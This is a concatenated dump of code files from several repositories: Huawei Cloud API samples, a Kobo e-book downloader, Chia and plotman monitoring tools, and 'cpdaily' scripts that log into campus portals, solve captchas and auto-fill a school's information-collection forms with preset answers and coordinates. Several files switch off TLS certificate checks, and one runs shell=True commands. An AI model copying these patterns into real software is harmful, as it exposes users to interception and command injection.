#
_context = ssl._create_unverified_context()
r = urllib2.urlopen(kreq, context=_context)
#
# We use HTTPError and URLError,because urllib2 can't process the 4XX &
# 500 error in the single urlopen function.
#
# If you use a modern, high-level designed HTTP client lib, Yeah, I mean requests,
# there is no this problem.
#
except HTTPError, e:
resp = e.read()
status_code = e.code
except URLError, e:
resp = e.read()
status_code = e.code
else:
status_code = r.code
resp = r.read()
return status_code, resp
#
# access asr, long_sentence, get the result
#
def _get_result(token, job_id):
_url_tmpl = 'https://ais.cn-north-1.myhuaweicloud.com/v1.0/voice/asr/long-sentence?job_id=%s'
_url = _url_tmpl % job_id
kreq = urllib2.Request( url = _url)
kreq.add_header('X-Auth-Token', token )
kreq.add_header('Content-Type', 'application/json')
resp = None
status_code = None
try:
#
# Here we use the unvertified-ssl-context, Because in FunctionStage
# the client CA-validation have some problem, so we must do this.
#
_context = ssl._create_unverified_context()
r = urllib2.urlopen(kreq, context=_context)
#
# We use HTTPError and URLError,because urllib2 can't process the 4XX &
# 500 error in the single urlopen function.
#
# If you use a modern, high-level designed HTTP client lib, Yeah, I mean requests,
# there is no this problem.
#
except HTTPError, e:
resp = e.read()
status_code = e.code
except URLError, e:
resp = e.read()
status_code = e.code
else:
status_code = r.code
resp = r.read()
return status_code, resp
if __name__ == '__main__':
user_name = '******'
password = '******'
account_name = '******' # the same as user_name in commonly use
demo_data_url = 'https://ais-sample-data.obs.myhwclouds.com/lsr-1.mp3'
token = get_token(user_name, password, account_name)
# call interface use the url
result = long_sentence(token, '', demo_data_url)
print result
# call interface use the file
result = long_sentence(token, encode_to_base64('data/asr-sentence.wav'))
print result
```
#### File: rest-client-samples/image/obs_adapter.py
```python
from com.obs.client.obs_client import ObsClient
import uuid
import sys
import os
import time
import urllib2
from urllib2 import HTTPError, URLError
def upload_file_2_obs(client, bucket, prefix, local_file, expires = 3600):
object_key = "%s_%s_%s" %(prefix, str(uuid.uuid1()), open(local_file, 'r').name)
#upload file
resp = client.putFile(bucket, object_key, file_path=local_file)
if resp.status >= 300:
return False, resp.errorMessage, ''
method='GET'
res = client.createV2SignedUrl(method, bucket, object_key)
return True, object_key, res['signedUrl']
def download_url_file(url, file_name):
try:
r = urllib2.urlopen(url)
except HTTPError, e:
resp = e.read()
rc = e.code
except URLError, e:
resp = e.read()
rc = e.code
else:
resp = r.read()
rc = r.code
if rc != 200:
return False
f = open(file_name, 'wb')
f.write(resp)
f.close()
return True
#1. download web url to import obs
#2. get obs read temp url
def change_weburl_2_obs(url, client, bucket, prefix, temp_file):
if not download_url_file(url, temp_file):
return False, ''
flag, key, url = upload_file_2_obs(client, bucket, prefix, temp_file)
os.remove(temp_file)
return flag, url
if __name__ == "__main__":
client = ObsClient(
access_key_id='OBS AK',
secret_access_key='OBS SK',
server='obs.cn-north-1.myhwclouds.com'
)
bucket = 'bucketXXX'
print change_weburl_2_obs('http://c.hiphotos.baidu.com/image/pic/item/ae51f3deb48f8c540e2d1dd336292df5e1fe7f54.jpg', client, bucket, 'WEBURL', 'a.jpg')
client.close()
#print upload_file_2_obs(client, bucket, 'MANUAL', 'a.jpg')
#print download_url_file('http://c.hiphotos.baidu.com/image/pic/item/ae51f3deb48f8c540e2d1dd336292df5e1fe7f54.jpg', 'a.jpg')
```
#### File: sdk/core/gettoken.py
```python
import urllib2
import json
def get_token(username, password, domain):
auth_data = {
"auth": {
"identity": {
"password": {
"user": {
"name": username,
"password": password,
"domain": {
"name": domain
}
}
},
"methods": [
"password"
]
},
"scope": {
"project": {
"name": "cn-north-1"
}
}
}
}
_url = 'https://iam.cn-north-1.myhuaweicloud.com/v3/auth/tokens'
req = urllib2.Request( url = _url)
req.add_header('Content-Type', 'application/json')
req.add_data(json.dumps(auth_data))
r = urllib2.urlopen(req)
X_TOKEN = r.headers['X-Subject-Token']
return X_TOKEN
``` |
{
"source": "79laowang/Python_scripts",
"score": 3
} |
#### File: 79laowang/Python_scripts/run-cmd.py
```python
import sys
import subprocess
def run_command(command, wait=False):
try:
if (wait):
p = subprocess.Popen(
[command],
stdout = subprocess.PIPE,
shell = True)
p.wait()
else:
p = subprocess.Popen(
[command],
shell = True,
stdin = None, stdout = None, stderr = None, close_fds = True)
(result, error) = p.communicate()
except subprocess.CalledProcessError as e:
sys.stderr.write(
"common::run_command() : [ERROR]: output = %s, error code = %s\n"
% (e.output, e.returncode))
return result
def main():
run_command('ls -l /tmp')
if __name__ == '__main__':
main()
``` |
{
"source": "7a6163/kobo-book-downloader",
"score": 2
} |
#### File: kobodl/commands/book.py
```python
import os
import click
from tabulate import tabulate
from kobodl import actions, cli
from kobodl.globals import Globals
def decorators(book):
append = ''
if book.Audiobook:
append += ' (🎧 Audiobook)'
if book.Archived:
append += ' (🗄️ Archived)'
return append
@click.group(name='book', short_help='list and download books')
def book():
pass
@book.command(name='get', short_help='download book')
@click.option(
'-u',
'--user',
type=click.STRING,
help='Required when multiple accounts exist. Use either Email or UserKey',
)
@click.option(
'-o',
'--output-dir',
type=click.Path(file_okay=False, dir_okay=True, writable=True),
default='kobo_downloads',
)
@click.option('-a', '--get-all', is_flag=True)
@click.argument('product-id', nargs=-1, type=click.STRING)
@click.pass_obj
def get(ctx, user, output_dir, get_all, product_id):
if len(Globals.Settings.UserList.users) == 0:
click.echo('error: no users found. Did you `kobodl user add`?', err=True)
exit(1)
if not user:
if len(Globals.Settings.UserList.users) > 1:
click.echo('error: must provide --user option when more than 1 user exists.')
exit(1)
# Exactly 1 user account exists
usercls = Globals.Settings.UserList.users[0]
else:
# A user was passed
usercls = Globals.Settings.UserList.getUser(user)
if not usercls:
click.echo(f'error: could not find user with name or id {user}')
exit(1)
if get_all and len(product_id):
click.echo(
'error: cannot pass product IDs when --get-all is used. Use one or the other.',
err=True,
)
exit(1)
if not get_all and len(product_id) == 0:
click.echo('error: must pass at least one Product ID, or use --get-all', err=True)
exit(1)
os.makedirs(output_dir, exist_ok=True)
if get_all:
actions.GetBookOrBooks(usercls, output_dir)
else:
for pid in product_id:
output = actions.GetBookOrBooks(usercls, output_dir, productId=pid)
@book.command(name='list', help='list books')
@click.option(
'-u',
'--user',
type=click.STRING,
required=False,
help='Limit list to a single user. Use either Email or UserKey',
)
@click.option('--read', is_flag=True, help='include books marked as read')
@click.option(
'--export-library',
type=click.File(mode='w'),
help='filepath to write raw JSON library data to.',
)
@click.pass_obj
def list(ctx, user, read, export_library):
userlist = Globals.Settings.UserList.users
if user:
userlist = [Globals.Settings.UserList.getUser(user)]
books = actions.ListBooks(userlist, read, export_library)
headers = ['Title', 'Author', 'RevisionId', 'Owner']
data = sorted(
[
(book.Title + decorators(book), book.Author, book.RevisionId, book.Owner.Email,)
for book in books
]
)
click.echo(tabulate(data, headers, tablefmt=ctx['fmt']))
cli.add_command(book)
```
#### File: kobodl/commands/user.py
```python
import click
from tabulate import tabulate
from kobodl import actions, cli
from kobodl.globals import Globals
from kobodl.kobo import Kobo
from kobodl.settings import User
@click.group(name='user', short_help='show and create users')
def user():
pass
@user.command(name='list', help='list all users')
@click.pass_obj
def list(ctx):
userlist = Globals.Settings.UserList.users
headers = ['Email', 'UserKey', 'DeviceId']
data = sorted([(user.Email, user.UserKey, user.DeviceId,) for user in userlist])
click.echo(tabulate(data, headers, tablefmt=ctx['fmt']))
@user.command(name='rm', help='remove user by Email, UserKey, or DeviceID')
@click.argument('identifier', type=click.STRING)
@click.pass_obj
def list(ctx, identifier):
removed = Globals.Settings.UserList.removeUser(identifier)
if removed:
Globals.Settings.Save()
click.echo(f'Removed {removed.Email}')
else:
click.echo(f'No user with email, key, or device id that matches "{identifier}"')
@user.command(name='add', help='add new user')
@click.option('--email', prompt=True, hide_input=False, type=click.STRING, help="kobo.com email.")
@click.password_option(help="kobo.com password (not stored)")
@click.pass_obj
def add(ctx, email, password):
user = User(Email=email)
click.echo(
"""
Open https://authorize.kobo.com/signin in a private/incognito window in your browser, wait till the page
loads (do not login!) then open the developer tools (use F12 in Firefox/Chrome), select the console tab,
and paste the following code there and then press Enter there in the browser.
var newCaptchaDiv = document.createElement( "div" );
newCaptchaDiv.id = "new-grecaptcha-container";
document.getElementById( "grecaptcha-container" ).insertAdjacentElement( "afterend", newCaptchaDiv );
grecaptcha.render( newCaptchaDiv.id, {
sitekey: "<KEY>",
callback: function( response ) { console.log( "Captcha response:" ); console.log( response ); }
} );
A captcha should show up below the Sign-in form. Once you solve the captcha its response will be written
below the pasted code in the browser's console. Copy the response (the line below "Captcha response:")
and paste it here.
"""
)
captcha = input('Captcha response: ').strip()
actions.Login(user, password, captcha)
Globals.Settings.UserList.users.append(user)
Globals.Settings.Save()
click.echo('Login Success. Try to list your books with `kobodl book list`')
cli.add_command(user)
``` |
{
"source": "7AC/chia-blockchain",
"score": 3
} |
#### File: 7AC/chia-blockchain/json_datasource.py
```python
from http.server import SimpleHTTPRequestHandler, HTTPServer
import json
import re
import subprocess
import time
hostName = "localhost"
serverPort = 8080
class FarmServer(SimpleHTTPRequestHandler):
statuses = {"Not available": 0,
"Not synced or not connected to peers": 1,
"Not running": 2,
"Syncing": 3,
"Farming": 4}
strings = frozenset(["Total size of plots",
"Estimated network space",
"Expected time to win",
"Note"])
def do_GET(self):
self.send_response(200)
def do_POST(self):
content_length = int(self.headers.get("Content-Length"))
body = self.rfile.read(content_length)
body_json = json.loads(body)
target = ""
try:
target = body_json["targets"]["target"]
except (TypeError, KeyError):
pass
stdout = subprocess.check_output(["chia", "farm", "summary"])
output = {}
for line in stdout.decode("utf-8").split("\n"):
try:
name, value = line.split(": ")
if not target or target == name:
output[name] = value
except ValueError:
continue
stdout = subprocess.check_output(["plotman", "status"])
tokens = re.split(" +", stdout.decode("utf-8"))
output["Plotting"] = len([token for token in tokens if token == "32"])
self.send_response(200)
self.send_header("Content-type", "application/json")
self.end_headers()
if self.path == '/search':
self.wfile.write(bytes(json.dumps(list(output.keys())), "utf-8"))
elif self.path == '/query':
columns = []
rows = []
for name, value in output.items():
column_type = "string" if name in self.strings else "number"
column_value = value
if name == "Farming status":
column_value = self.statuses[value]
columns.append({"text": name, "type": column_type})
rows.append(column_value)
table = [{"columns": columns,
"rows": [rows],
"type": "table"}]
self.wfile.write(bytes(json.dumps(table), "utf-8"))
if __name__ == "__main__":
webServer = HTTPServer((hostName, serverPort), FarmServer)
print("Server started http://%s:%s" % (hostName, serverPort))
try:
webServer.serve_forever()
except KeyboardInterrupt:
pass
webServer.server_close()
print("Server stopped.")
``` |
{
"source": "7AC/plotman",
"score": 2
} |
#### File: plotman/src/exporter.py
```python
import importlib
import importlib.resources
import time
from plotman import configuration
from plotman import resources as plotman_resources
from plotman.job import Job
from prometheus_client import start_http_server
from prometheus_client.core import GaugeMetricFamily, REGISTRY
class PlotmanCollector:
def collect(self):
config_path = configuration.get_path()
config_text = configuration.read_configuration_text(config_path)
config_path = configuration.get_path()
config_text = configuration.read_configuration_text(config_path)
preset_target_definitions_text = importlib.resources.read_text(
plotman_resources, "target_definitions.yaml",
)
cfg = configuration.get_validated_configs(config_text, config_path, preset_target_definitions_text)
running_jobs = Job.get_running_jobs(cfg.logging.plots)
phases = {1: 0,
2: 0,
3: 0,
4: 0}
for running_job in running_jobs:
phases[running_job.phase.major] += 1
for phase in phases.keys():
yield GaugeMetricFamily(f"plotman_jobs_count_phase_{phase}",
f"Number of plotting jobs in phase {phase}", value=phases[phase])
if __name__ == "__main__":
start_http_server(8001)
REGISTRY.register(PlotmanCollector())
while True:
time.sleep(1)
```
#### File: src/plotman/manager.py
```python
import logging
import operator
import os
import random
import re
import subprocess
import sys
import time
from datetime import datetime
import pendulum
import psutil
# Plotman libraries
from plotman import \
archive # for get_archdir_freebytes(). TODO: move to avoid import loop
from plotman import job, plot_util
# Constants
MIN = 60 # Seconds
HR = 3600 # Seconds
MAX_AGE = 1000_000_000 # Arbitrary large number of seconds
_WINDOWS = sys.platform == 'win32'
def dstdirs_to_furthest_phase(all_jobs):
'''Return a map from dst dir to a phase tuple for the most progressed job
that is emitting to that dst dir.'''
result = {}
for j in all_jobs:
if not j.dstdir in result.keys() or result[j.dstdir] < j.progress():
result[j.dstdir] = j.progress()
return result
def dstdirs_to_youngest_phase(all_jobs):
'''Return a map from dst dir to a phase tuple for the least progressed job
that is emitting to that dst dir.'''
result = {}
for j in all_jobs:
if j.dstdir is None:
continue
if not j.dstdir in result.keys() or result[j.dstdir] > j.progress():
result[j.dstdir] = j.progress()
return result
def phases_permit_new_job(phases, d, sched_cfg, dir_cfg):
'''Scheduling logic: return True if it's OK to start a new job on a tmp dir
with existing jobs in the provided phases.'''
# Filter unknown-phase jobs
phases = [ph for ph in phases if ph.known]
if len(phases) == 0:
return True
milestone = job.Phase(
major=sched_cfg.tmpdir_stagger_phase_major,
minor=sched_cfg.tmpdir_stagger_phase_minor,
)
# tmpdir_stagger_phase_limit default is 1, as declared in configuration.py
if len([p for p in phases if p < milestone]) >= sched_cfg.tmpdir_stagger_phase_limit:
return False
# Limit the total number of jobs per tmp dir. Default to the overall max
# jobs configuration, but restrict to any configured overrides.
max_plots = sched_cfg.tmpdir_max_jobs
if dir_cfg.tmp_overrides is not None and d in dir_cfg.tmp_overrides:
curr_overrides = dir_cfg.tmp_overrides[d]
if curr_overrides.tmpdir_max_jobs is not None:
max_plots = curr_overrides.tmpdir_max_jobs
if len(phases) >= max_plots:
return False
return True
def maybe_start_new_plot(dir_cfg, sched_cfg, plotting_cfg, log_cfg):
jobs = job.Job.get_running_jobs(log_cfg.plots)
wait_reason = None # If we don't start a job this iteration, this says why.
youngest_job_age = min(jobs, key=job.Job.get_time_wall).get_time_wall() if jobs else MAX_AGE
global_stagger = int(sched_cfg.global_stagger_m * MIN)
if (youngest_job_age < global_stagger):
wait_reason = 'stagger (%ds/%ds)' % (youngest_job_age, global_stagger)
elif len(jobs) >= sched_cfg.global_max_jobs:
wait_reason = 'max jobs (%d) - (%ds/%ds)' % (sched_cfg.global_max_jobs, youngest_job_age, global_stagger)
else:
tmp_to_all_phases = [(d, job.job_phases_for_tmpdir(d, jobs)) for d in dir_cfg.tmp]
eligible = [ (d, phases) for (d, phases) in tmp_to_all_phases
if phases_permit_new_job(phases, d, sched_cfg, dir_cfg) ]
rankable = [ (d, phases[0]) if phases else (d, job.Phase(known=False))
for (d, phases) in eligible ]
if not eligible:
wait_reason = 'no eligible tempdirs (%ds/%ds)' % (youngest_job_age, global_stagger)
else:
# Plot to oldest tmpdir.
tmpdir = max(rankable, key=operator.itemgetter(1))[0]
if dir_cfg.dst_is_tmp2():
dstdir = dir_cfg.tmp2
elif dir_cfg.dst_is_tmp():
dstdir = tmpdir
else:
# Select the dst dir least recently selected
dst_dirs = dir_cfg.get_dst_directories()
dir2ph = { d:ph for (d, ph) in dstdirs_to_youngest_phase(jobs).items()
if d in dst_dirs and ph is not None}
unused_dirs = [d for d in dst_dirs if d not in dir2ph.keys()]
dstdir = ''
if unused_dirs:
dstdir = random.choice(unused_dirs)
else:
dstdir = max(dir2ph, key=dir2ph.get)
log_file_path = log_cfg.create_plot_log_path(time=pendulum.now())
plot_args = ['chia', 'plots', 'create',
'-k', str(plotting_cfg.k),
'-r', str(plotting_cfg.n_threads),
'-u', str(plotting_cfg.n_buckets),
'-b', str(plotting_cfg.job_buffer),
'-t', tmpdir,
'-d', dstdir ]
if plotting_cfg.e:
plot_args.append('-e')
if plotting_cfg.farmer_pk is not None:
plot_args.append('-f')
plot_args.append(plotting_cfg.farmer_pk)
if plotting_cfg.pool_pk is not None:
plot_args.append('-p')
plot_args.append(plotting_cfg.pool_pk)
if plotting_cfg.pool_contract_address is not None:
plot_args.append('-c')
plot_args.append(plotting_cfg.pool_contract_address)
if dir_cfg.tmp2 is not None:
plot_args.append('-2')
plot_args.append(dir_cfg.tmp2)
if plotting_cfg.x:
plot_args.append('-x')
logmsg = ('Starting plot job: %s ; logging to %s' % (' '.join(plot_args), log_file_path))
# TODO: CAMPid 09840103109429840981397487498131
try:
open_log_file = open(log_file_path, 'x')
except FileExistsError:
# The desired log file name already exists. Most likely another
# plotman process already launched a new process in response to
# the same scenario that triggered us. Let's at least not
# confuse things further by having two plotting processes
# logging to the same file. If we really should launch another
# plotting process, we'll get it at the next check cycle anyways.
message = (
f'Plot log file already exists, skipping attempt to start a'
f' new plot: {log_file_path!r}'
)
return (False, logmsg)
except FileNotFoundError as e:
message = (
f'Unable to open log file. Verify that the directory exists'
f' and has proper write permissions: {log_file_path!r}'
)
raise Exception(message) from e
# Preferably, do not add any code between the try block above
# and the with block below. IOW, this space intentionally left
# blank... As is, this provides a good chance that our handle
# of the log file will get closed explicitly while still
# allowing handling of just the log file opening error.
with open_log_file:
# start_new_sessions to make the job independent of this controlling tty (POSIX only).
# subprocess.CREATE_NO_WINDOW to make the process independent of this controlling tty and have no console window on Windows.
p = subprocess.Popen(plot_args,
stdout=open_log_file,
stderr=subprocess.STDOUT,
start_new_session=True,
creationflags=0 if not _WINDOWS else subprocess.CREATE_NO_WINDOW)
psutil.Process(p.pid).nice(15 if not _WINDOWS else psutil.BELOW_NORMAL_PRIORITY_CLASS)
return (True, logmsg)
return (False, wait_reason)
def select_jobs_by_partial_id(jobs, partial_id):
selected = []
for j in jobs:
if j.plot_id.startswith(partial_id):
selected.append(j)
return selected
``` |
{
"source": "7aGiven/cpdaily",
"score": 3
} |
#### File: python/actions/casLogin.py
```python
import re
import requests
import urllib.parse
from bs4 import BeautifulSoup
from urllib3.exceptions import InsecureRequestWarning
from actions.utils import Utils
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class casLogin:
# 初始化cas登陆模块
def __init__(self, username, password, login_url, host, session):
self.username = username
self.password = password
self.login_url = login_url
self.host = host
self.session = session
self.type = 0
self.headers = {
'User-Agent':
'Mozilla/5.0 (Linux; Android 8.0.0; MI 6 Build/OPR1.170623.027; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/92.0.4515.131 Mobile Safari/537.36 okhttp/3.12.4',
'Content-Type': 'application/x-www-form-urlencoded'
}
# 判断是否需要验证码
def getNeedCaptchaUrl(self):
if self.type == 0:
url = self.host + 'authserver/needCaptcha.html' + '?username=' + self.username
flag = self.session.get(url, verify=False).text
return 'false' != flag[:5] and 'False' != flag[:5]
else:
url = self.host + 'authserver/checkNeedCaptcha.htl' + '?username=' + self.username
flag = self.session.get(url, verify=False).json()
return flag['isNeed']
def login(self):
html = self.session.get(self.login_url, verify=False).text
soup = BeautifulSoup(html, 'lxml')
if len(soup.select('#casLoginForm')) > 0:
self.type = 0
elif len(soup.select('#loginFromId')) > 0:
soup = BeautifulSoup(str(soup.select('#loginFromId')[1]), 'lxml')
self.type = 1
elif len(soup.select('#fm1')) > 0:
soup = BeautifulSoup(str(soup.select('#fm1')[0]), 'lxml')
self.type = 2
else:
raise Exception('出错啦!网页中没有找到LoginForm')
# 填充数据
params = {}
form = soup.select('input')
for item in form:
if None != item.get('name') and len(item.get('name')) > 0:
if item.get('name') != 'rememberMe':
if None == item.get('value'):
params[item.get('name')] = ''
else:
params[item.get('name')] = item.get('value')
params['username'] = self.username
# 获取密钥
if self.type == 2:
pattern = 'RSAKeyPair\((.*?)\);'
publicKey = re.findall(pattern, html)
publicKey = publicKey[0].replace('"', "").split(',')
params['password'] = Utils.encryptRSA(self.password, publicKey[2],
publicKey[0])
params['captcha'] = Utils.getCodeFromImg(
self.session, self.host + 'lyuapServer/captcha.jsp')
else:
if self.type == 0:
salt = soup.select("#pwdDefaultEncryptSalt")
else:
salt = soup.select("#pwdEncryptSalt")
if len(salt) != 0:
salt = salt[0].get('value')
else:
pattern = '\"(\w{16})\"'
salt = re.findall(pattern, html)
if len(salt) == 1:
salt = salt[0]
else:
salt = False
if not salt:
params['password'] = self.password
else:
params['password'] = Utils.encryptAES(
Utils.randString(64) + self.password, salt)
if self.getNeedCaptchaUrl():
if self.type == 0:
imgUrl = self.host + 'authserver/captcha.html'
params['captchaResponse'] = Utils.getCodeFromImg(
self.session, imgUrl)
else:
imgUrl = self.host + 'authserver/getCaptcha.htl'
params['captcha'] = Utils.getCodeFromImg(
self.session, imgUrl)
data = self.session.post(self.login_url,
data=urllib.parse.urlencode(params),
headers=self.headers,
allow_redirects=False)
# 如果等于302强制跳转,代表登陆成功
if data.status_code == 302:
jump_url = data.headers['Location']
res = self.session.post(jump_url, verify=False)
if res.url.find('campusphere.net/') == -1:
raise Exception('CAS登陆失败,未能成功跳转今日校园!')
return self.session.cookies
elif data.status_code == 200 or data.status_code == 401:
data = data.text
soup = BeautifulSoup(data, 'lxml')
if len(soup.select('#errorMsg')) > 0:
msg = soup.select('#errorMsg')[0].get_text()
elif len(soup.select('#formErrorTip2')) > 0:
msg = soup.select('#formErrorTip2')[0].get_text()
elif len(soup.select('#msg')) > 0:
msg = soup.select('#msg')[0].get_text()
else:
msg = 'CAS登陆失败,意料之外的错误!'
raise Exception(msg)
else:
raise Exception('CAS登陆失败!返回状态码:' + str(data.status_code))
```
#### File: python/actions/collection.py
```python
import json
from actions.utils import Utils
from actions.wiseLoginService import wiseLoginService
class Collection:
# 初始化信息收集类
def __init__(self, wiseLoginService: wiseLoginService, userInfo):
self.session = wiseLoginService.session
self.host = wiseLoginService.campus_host
self.userInfo = userInfo
self.form = None
self.collectWid = None
self.formWid = None
self.schoolTaskWid = None
self.instanceWid = None
self.apis = Utils.getApis(userInfo['type'])
# 查询表单
def queryForm(self):
headers = self.session.headers
headers['Content-Type'] = 'application/json'
queryUrl = self.host + self.apis[0]
params = {"pageSize": 20, "pageNumber": 1}
res = self.session.post(queryUrl,
data=json.dumps(params),
headers=headers,
verify=False).json()
if len(res['datas']['rows']) < 1:
raise Exception('当前暂时没有未完成的信息收集哦!')
for item in res['datas']['rows']:
if item['isHandled'] == 0:
self.collectWid = item['wid']
self.formWid = item['formWid']
self.instanceWid = item['instanceWid']
if (self.formWid == None):
raise Exception('当前暂时没有未完成的信息收集哦!')
detailUrl = self.host + self.apis[1]
res = self.session.post(detailUrl,
headers=headers,
data=json.dumps({
"collectorWid": self.collectWid,
"instanceWid": self.instanceWid
}),
verify=False).json()
self.schoolTaskWid = res['datas']['collector']['schoolTaskWid']
getFormUrl = self.host + self.apis[2]
params = {
"pageSize": 100,
"pageNumber": 1,
"formWid": self.formWid,
"collectorWid": self.collectWid,
"instanceWid": self.instanceWid
}
res = self.session.post(getFormUrl,
headers=headers,
data=json.dumps(params),
verify=False).json()
self.form = res['datas']['rows']
# 填写表单
def fillForm(self):
index = 0
onlyRequired = self.userInfo[
'onlyRequired'] if 'onlyRequired' in self.userInfo else 1
for formItem in self.form[:]:
if onlyRequired == 1:
if not formItem['isRequired']:
# 移除非必填选项
self.form.remove(formItem)
continue
try:
userForm = self.userInfo['forms'][index]['form']
except:
raise Exception('请检查forms配置是否正确!')
# 判断用户是否需要检查标题
if self.userInfo['checkTitle'] == 1:
# 如果检查到标题不相等
if formItem['title'] != userForm['title']:
raise Exception(
f'\r\n第{index + 1}个配置项的标题不正确\r\n您的标题为:[{userForm["title"]}]\r\n系统的标题为:[{formItem["title"]}]'
)
# 忽略用户指定题目
if 'ignore' in userForm and userForm['ignore']:
formItem['value'] = None
# 设置显示为false
formItem['show'] = False
# 清空所有的选项
if 'fieldItems' in formItem:
formItem['fieldItems'].clear()
index += 1
continue
# 文本选项直接赋值
if formItem['fieldType'] in ['1', '5', '6', '7']:
formItem['value'] = userForm['value']
# 单选框填充
elif formItem['fieldType'] == '2':
# 单选需要移除多余的选项
fieldItems = formItem['fieldItems']
for fieldItem in fieldItems[:]:
if fieldItem['content'] == userForm['value']:
formItem['value'] = fieldItem['itemWid']
if fieldItem['isOtherItems'] and fieldItem[
'otherItemType'] == '1':
if 'extra' not in userForm:
raise Exception(
f'\r\n第{index + 1}个配置项的选项不正确,该选项需要extra字段')
fieldItem['contentExtend'] = userForm['extra']
else:
fieldItems.remove(fieldItem)
if len(fieldItems) != 1:
raise Exception(f'\r\n第{index + 1}个配置项的选项不正确,该选项为必填单选')
# 多选填充
elif formItem['fieldType'] == '3':
fieldItems = formItem['fieldItems']
userItems = userForm['value'].split('|')
tempValue = []
for fieldItem in fieldItems[:]:
if fieldItem['content'] in userItems:
tempValue.append(fieldItem['itemWid'])
if fieldItem['isOtherItems'] and fieldItem[
'otherItemType'] == '1':
if 'extra' not in userForm:
raise Exception(
f'\r\n第{index + 1}个配置项的选项不正确,该选项需要extra字段')
fieldItem['contentExtend'] = userForm['extra']
else:
fieldItems.remove(fieldItem)
if len(fieldItems) == 0:
raise Exception(f'\r\n第{index + 1}个配置项的选项不正确,该选项为必填多选')
formItem['value'] = ','.join(tempValue)
elif formItem['fieldType'] == '4':
Utils.uploadPicture(self, self.apis[4], userForm['value'])
formItem['value'] = Utils.getPictureUrl(self, self.apis[5])
else:
raise Exception(f'\r\n第{index + 1}个配置项的类型未适配')
index += 1
# 提交表单
def submitForm(self):
self.submitData = {
"formWid": self.formWid,
"address": self.userInfo['address'],
"collectWid": self.collectWid,
"instanceWid": self.instanceWid,
"schoolTaskWid": self.schoolTaskWid,
"form": self.form,
"uaIsCpadaily": True,
"latitude": self.userInfo['lat'],
'longitude': self.userInfo['lon']
}
self.submitApi = self.apis[3]
res = Utils.submitFormData(self).json()
return res['message']
```
#### File: python/actions/wiseLoginService.py
```python
import re
import requests
from urllib3.exceptions import InsecureRequestWarning
from actions.casLogin import casLogin
from actions.iapLogin import iapLogin
from actions.utils import Utils
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
class wiseLoginService:
# 初始化本地登录类
def __init__(self, userInfo, httpProxy):
if None == userInfo['username'] or '' == userInfo[
'username'] or None == userInfo['password'] or '' == userInfo[
'password'] or None == userInfo[
'schoolName'] or '' == userInfo['schoolName']:
raise Exception('初始化类失败,请键入完整的参数(用户名,密码,学校名称)')
self.username = userInfo['username']
self.password = userInfo['password']
self.schoolName = userInfo['schoolName']
self.session = requests.session()
headers = {
'User-Agent':
'Mozilla/5.0 (Linux; Android 8.0.0; MI 6 Build/OPR1.170623.027; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/92.0.4515.131 Mobile Safari/537.36 okhttp/3.12.4',
}
self.session.headers = headers
self.session.hooks['response'].append(Utils.checkStatus)
self.session.adapters.DEFAULT_RETRIES = 5
if httpProxy != '':
Utils.log('全局代理已启用')
self.session.proxies = {'http': httpProxy, 'https': httpProxy}
self.session.hooks['response'].append(Utils.checkStatus)
self.login_url = ''
self.campus_host = ''
self.login_host = ''
self.loginEntity = None
self.login_type = ''
# 通过学校名称借助api获取学校的登陆url
def getLoginUrlBySchoolName(self):
schools = self.session.get(
'https://mobile.campushoy.com/v6/config/guest/tenant/list',
verify=False).json()['data']
flag = False
for item in schools:
if item['name'] == self.schoolName:
flag = True
if item['joinType'] == 'NONE':
raise Exception(self.schoolName + '未加入今日校园,请检查...')
params = {'ids': item['id']}
data = self.session.get(
'https://mobile.campushoy.com/v6/config/guest/tenant/info',
params=params,
verify=False,
).json()['data'][0]
joinType = data['joinType']
ampUrl = data['ampUrl']
ampUrl2 = data['ampUrl2']
if 'campusphere' in ampUrl:
clientUrl = ampUrl
elif 'campusphere' in ampUrl2:
clientUrl = ampUrl2
else:
raise Exception('未找到客户端登录地址')
res = self.session.get(clientUrl, verify=False)
self.campus_host = re.findall('\w{4,5}\:\/\/.*?\/',
clientUrl)[0]
self.login_url = res.url
self.login_host = re.findall('\w{4,5}\:\/\/.*?\/', res.url)[0]
self.login_type = joinType
break
if flag == False:
raise Exception(self.schoolName + '不存在或未加入今日校园')
# 通过登陆url判断采用哪种登陆方式
def checkLogin(self):
if self.login_type == 'CLOUD':
self.loginEntity = iapLogin(self.username, self.password,
self.login_url, self.login_host,
self.session)
self.session.cookies = self.loginEntity.login()
else:
self.loginEntity = casLogin(self.username, self.password,
self.login_url, self.login_host,
self.session)
self.session.cookies = self.loginEntity.login()
# 本地化登陆
def login(self):
# 获取学校登陆地址
self.getLoginUrlBySchoolName()
self.checkLogin()
```
#### File: main/python/index.py
```python
from tencentcloud.common.profile.http_profile import HttpProfile
from actions.wiseLoginService import wiseLoginService
from actions.autoSign import AutoSign
from actions.collection import Collection
from actions.workLog import workLog
from actions.pushKit import pushKit
from actions.utils import Utils
from time import sleep
def main():
Utils.log("自动化任务开始执行")
config = Utils.getYmlConfig()
push = pushKit(config['notifyOption'])
httpProxy = config['httpProxy'] if 'httpProxy' in config else ''
for user in config['users']:
Utils.log(
f"10s后开始执行用户{user['user']['username'] if user['user']['username'] else '默认用户'}的任务"
)
sleep(10)
if config['debug']:
msg = working(user, httpProxy)
else:
try:
msg = working(user, httpProxy)
ret = True
except Exception as e:
msg = str(e)
ret = False
ntm = Utils.getTimeStr()
if ret == True:
#此处需要注意就算提示成功也不一定是真的成功,以实际为准
Utils.log(msg)
if 'SUCCESS' in msg:
msg = push.sendMsg(
'今日校园签到成功通知',
'服务器(V%s)于%s尝试签到成功!' % (config['Version'], ntm),
user['user'])
else:
msg = push.sendMsg(
'今日校园签到异常通知', '服务器(V%s)于%s尝试签到异常!\n异常信息:%s' %
(config['Version'], ntm, msg), user['user'])
else:
Utils.log("Error:" + msg)
msg = push.sendMsg(
'今日校园签到失败通知', '服务器(V%s)于%s尝试签到失败!\n错误信息:%s' %
(config['Version'], ntm, msg), user['user'])
Utils.log(msg)
Utils.log("自动化任务执行完毕")
def working(user, httpProxy):
Utils.log('正在获取登录地址')
wise = wiseLoginService(user['user'], httpProxy)
Utils.log('开始尝试登录账号')
wise.login()
sleep(1)
# 登陆成功,通过type判断当前属于 信息收集、签到、查寝
# 信息收集
if user['user']['type'] == 0:
# 以下代码是信息收集的代码
Utils.log('开始执行收集任务')
collection = Collection(wise, user['user'])
collection.queryForm()
